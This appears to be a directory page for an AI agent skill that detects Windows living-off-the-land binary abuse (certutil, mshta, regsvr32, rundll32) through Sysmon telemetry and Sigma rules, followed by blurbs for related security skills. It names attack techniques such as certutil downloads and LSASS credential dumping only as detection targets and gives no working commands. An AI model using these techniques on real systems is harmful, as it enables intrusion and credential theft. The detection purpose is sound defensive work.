detecting-living-off-the-land-with-lolbas

by mukul975

detecting-living-off-the-land-with-lolbas helps detect LOLBAS abuse with Sysmon and Windows Event Logs, using process telemetry, parent-child context, Sigma rules, and a practical guide for triage, hunting, and rule drafting. It supports detecting-living-off-the-land-with-lolbas for Threat Modeling and analyst workflows with certutil, regsvr32, mshta, and rundll32.

Stars0

Favorites0

Comments0

AddedMay 9, 2026

CategoryThreat Modeling

Install Command

npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill detecting-living-off-the-land-with-lolbas

Curation Score

This skill scores 78/100: it is a solid listing candidate with enough real detection workflow content to help agents act more effectively than with a generic prompt. Directory users should expect useful threat-hunting structure and examples, but not a fully polished, turn-key operating guide.

78/100

Strengths

Strong operational focus on LOLBin abuse detection using Sysmon/Windows Event Logs, Sigma rules, and parent-child process analysis.
Repository includes a substantial skill body plus a supporting script and reference file, which improves triggerability and agent leverage.
The frontmatter is valid and the skill names concrete targets like certutil, regsvr32, mshta, rundll32, and msbuild, making intent easy to recognize.

Cautions

No install command is present in SKILL.md, so adoption may require manual setup or interpretation.
The excerpt shows limited progressive disclosure signals beyond overview/prerequisites, so some execution details may still need user prompting or inspection of supporting files.

Cybersecurity Threat Detection Threat Hunting Security Windows Security Sysmon Sigma Rules Lolbins

Overview

Overview of detecting-living-off-the-land-with-lolbas skill

What this skill does

The detecting-living-off-the-land-with-lolbas skill helps you detect abuse of LOLBAS/LOLBins such as certutil.exe, regsvr32.exe, mshta.exe, and rundll32.exe using process telemetry, parent-child process context, and Sigma-style detection logic. It is most useful when you need a practical detecting-living-off-the-land-with-lolbas guide for hunting, triage, or rule drafting instead of a generic explanation of LOLBins.

Who should install it

This skill is a good fit for SOC analysts, threat hunters, detection engineers, and blue teamers working with Sysmon or Windows event logs. It also works well for detecting-living-off-the-land-with-lolbas for Threat Modeling when you want to reason about how common Windows utilities could be abused in your environment.

What makes it different

The repo is not just a prose overview: it combines detection ideas, reference signatures, and a small helper script to anchor the workflow. The main value is in turning rough suspicious process activity into concrete detection patterns and investigation steps with less guesswork.

How to Use detecting-living-off-the-land-with-lolbas skill

Install the skill

Use the directory’s standard install flow for this repo: npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill detecting-living-off-the-land-with-lolbas. If your environment already has the parent skills repo, point your workflow at the skills/detecting-living-off-the-land-with-lolbas path so you can inspect the supporting files directly.

Start with the highest-signal files

Read SKILL.md first, then open references/api-reference.md for the concrete event and Sigma examples, and scripts/agent.py for the detection heuristics it encodes. Those three files tell you faster than a skim whether the detecting-living-off-the-land-with-lolbas skill matches your data sources and detection stack.

Turn a vague request into a useful prompt

Good inputs include the telemetry source, the suspicious binary, and the outcome you want. For example: “Analyze Sysmon Event ID 1 entries for mshta.exe launched by Office, identify LOLBAS abuse indicators, and draft Sigma-style conditions for detecting-living-off-the-land-with-lolbas usage.” That is much stronger than “look for malware,” because it gives the skill a target process, parent context, and deliverable.

Workflow that gives better results

Use this order: collect the process creation data, identify the LOLBin and parent process, compare the command line against known suspicious patterns, then convert the finding into a detection rule or hunt query. If the first pass is noisy, narrow by parent image, network indicators, or command-line substrings before broadening again.

detecting-living-off-the-land-with-lolbas skill FAQ

Is this only for defenders?

Yes, this is primarily a blue-team and detection use case. The detecting-living-off-the-land-with-lolbas skill is designed to help you spot suspicious usage, not to teach offensive tradecraft.

Do I need Sysmon to use it well?

Sysmon is the strongest fit, but Windows Security Event ID 4688 with command-line logging can still support useful analysis. If you only have minimal endpoint telemetry, the skill becomes less precise because parent-child process analysis matters a lot here.

How is this different from a normal prompt?

A normal prompt may mention LOLBins in general terms, but this skill is anchored to specific process telemetry, signatures, and rule-writing patterns. That makes it better when you need repeatable detection logic instead of a one-off narrative answer.

When should I skip this skill?

Skip it if your problem is endpoint hardening, malware reverse engineering, or generic incident response without process-creation evidence. It is strongest when the task is detection engineering, threat hunting, or detecting-living-off-the-land-with-lolbas for Threat Modeling around Windows execution abuse.

How to Improve detecting-living-off-the-land-with-lolbas skill

Give the skill the right evidence

The best inputs are small, structured samples: image name, command line, parent image, user, timestamp, host role, and whether the event came from Sysmon or 4688. A request like “WINWORD.EXE spawned rundll32.exe with javascript: on a finance workstation” produces better output than a vague “suspicious rundll32” note.

Ask for a specific output shape

If you want detection value, say whether you need triage notes, hunt logic, Sigma conditions, or an analyst summary. The detecting-living-off-the-land-with-lolbas usage improves when you request one clear artifact, such as “list the top 5 suspicious fields and draft a Sigma selection block.”

Watch for common failure modes

The most common mistake is overcalling normal admin activity as malicious. To reduce false positives, include the parent process, exact command-line switches, and any expected maintenance context; if you omit those, the skill has to guess whether a LOLBin is abused or just used legitimately.

Iterate from a narrow baseline

Start with one binary and one telemetry source, then widen only if the first answer is too shallow. For example, ask first about certutil.exe downloads from Sysmon, then expand to mshta.exe, regsvr32.exe, and rundll32.exe once you have a stable detection pattern and can compare coverage.

Ratings & Reviews

No ratings yet

Share your review

0/10000

Latest reviews

Saving...

more skill

security-threat-model

by openai

Repository-grounded security-threat-model skill for AppSec threat modeling. It maps trust boundaries, assets, attacker goals, abuse paths, and mitigations into a concise Markdown threat model. Use it when you need security-threat-model for Threat Modeling on a specific repo or path, not a generic architecture review or code check.

Threat Modeling

Favorites 0GitHub 0

solana-vulnerability-scanner

by trailofbits

solana-vulnerability-scanner is a focused Solana security audit skill for native Rust and Anchor programs. It helps review CPI logic, PDA validation, signer and ownership checks, and sysvar spoofing to catch six critical Solana-specific vulnerabilities before deployment.

Security Audit

Favorites 0GitHub 4.9k

exploiting-insecure-data-storage-in-mobile

by mukul975

The exploiting-insecure-data-storage-in-mobile skill helps assess and extract evidence from insecure local storage in Android and iOS apps. It covers SharedPreferences, SQLite databases, plist files, world-readable files, backup exposure, and weak keychain/keystore handling for mobile pentesting and Security Audit workflows.

Security Audit

Favorites 0GitHub 6.2k

algorand-vulnerability-scanner

by trailofbits

algorand-vulnerability-scanner is a security-audit skill for Algorand TEAL and PyTeal. It helps find 11 common issues, including rekeying attacks, fee validation gaps, field checks, and access control flaws. Use the algorand-vulnerability-scanner skill for a practical first-pass review before a manual audit.

Security Audit

Favorites 0GitHub 4.9k

evaluating-threat-intelligence-platforms

by mukul975

evaluating-threat-intelligence-platforms helps you compare TIP products by feed ingestion, STIX/TAXII support, automation, analyst workflow, integrations, and total cost of ownership. Use this evaluating-threat-intelligence-platforms guide for procurement, migration, or maturity planning, including evaluating-threat-intelligence-platforms for Threat Modeling when platform choice affects traceability and evidence sharing.

Threat Modeling

Favorites 0GitHub 0

detecting-insider-threat-behaviors

by mukul975

detecting-insider-threat-behaviors helps analysts hunt insider-risk signals like unusual data access, off-hours activity, mass downloads, privilege abuse, and resignation-correlated theft. Use this detecting-insider-threat-behaviors guide for threat hunting, UEBA-style triage, and threat modeling with workflow templates, SIEM query examples, and risk weights.

Threat Modeling

Favorites 0GitHub 0

detecting-credential-dumping-techniques

by mukul975

The detecting-credential-dumping-techniques skill helps you detect LSASS access, SAM export, NTDS.dit theft, and comsvcs.dll MiniDump abuse using Sysmon Event ID 10, Windows Security logs, and SIEM correlation rules. It is built for threat hunting, detection engineering, and Security Audit workflows.

Security Audit

Favorites 0GitHub 0

collecting-threat-intelligence-with-misp

by mukul975

The collecting-threat-intelligence-with-misp skill helps you collect, normalize, search, and export threat intelligence in MISP. Use this collecting-threat-intelligence-with-misp guide for feeds, PyMISP workflows, event filtering, warninglist reduction, and practical collecting-threat-intelligence-with-misp for Threat Modeling and CTI operations.

Threat Modeling

Favorites 0GitHub 0

analyzing-threat-intelligence-feeds

by mukul975

Analyzing-threat-intelligence-feeds helps you ingest CTI feeds, normalize indicators, assess feed quality, and enrich IOCs for STIX 2.1 workflows. This analyzing-threat-intelligence-feeds skill is built for threat intel operations and Data Analysis, with practical guidance for TAXII, MISP, and commercial feeds.

Data Analysis

Favorites 0GitHub 0

cosmos-vulnerability-scanner

by trailofbits

cosmos-vulnerability-scanner finds consensus-critical bugs in Cosmos SDK modules, CosmWasm contracts, IBC integrations, and Cosmos EVM stacks. Use this cosmos-vulnerability-scanner guide for security audit workflows, chain-halt risks, fund-loss paths, and pre-launch reviews.

Security Audit

Favorites 0GitHub 4.9k

detecting-process-injection-techniques

by mukul975

detecting-process-injection-techniques helps analyze suspicious in-memory activity, validate EDR alerts, and identify process hollowing, APC injection, thread hijacking, reflective loading, and classic DLL injection for Security Audit and malware triage.

Security Audit

Favorites 0GitHub 0

detecting-email-forwarding-rules-attack

by mukul975

The detecting-email-forwarding-rules-attack skill helps Security Audit, threat hunting, and incident response teams find malicious mailbox forwarding rules used for persistence and email collection. It guides analysts through Microsoft 365 and Exchange evidence, suspicious rule patterns, and practical triage for forwarding, redirect, delete, and hide behaviors.

Security Audit

Favorites 0GitHub 0

analyzing-ios-app-security-with-objection

by mukul975

The analyzing-ios-app-security-with-objection skill helps authorized testers run runtime iOS app security checks with Objection and Frida. Use it to review keychain exposure, filesystem storage, cookies, SSL pinning, jailbreak detection, and other client-side defenses during a Security Audit. Includes workflow guidance, install steps, and practical usage notes.

Security Audit

Favorites 0GitHub 0

analyzing-heap-spray-exploitation

by mukul975

analyzing-heap-spray-exploitation helps analyze heap spray exploitation in memory dumps with Volatility3. It identifies NOP sled patterns, suspicious large allocations, shellcode landing zones, and process VAD evidence for Security Audit, malware triage, and exploit validation.

Security Audit

Favorites 0GitHub 0

detecting-supply-chain-attacks-in-ci-cd

by mukul975

detecting-supply-chain-attacks-in-ci-cd skill for auditing GitHub Actions and CI/CD configs. It helps find unpinned actions, script injection, dependency confusion, secret exposure, and risky permissions for Security Audit workflows. Use it to review a repo, workflow file, or suspicious pipeline change with clear findings and fixes.

Security Audit

Favorites 0GitHub 0

detecting-api-enumeration-attacks

by mukul975

detecting-api-enumeration-attacks helps Security Audit teams detect API probing, BOLA, and IDOR by analyzing sequential IDs, 404 bursts, authorization failures, and docs discovery paths. It is built for log-driven detection guidance, rule drafting, and practical review of API abuse patterns.

Security Audit

Favorites 0GitHub 0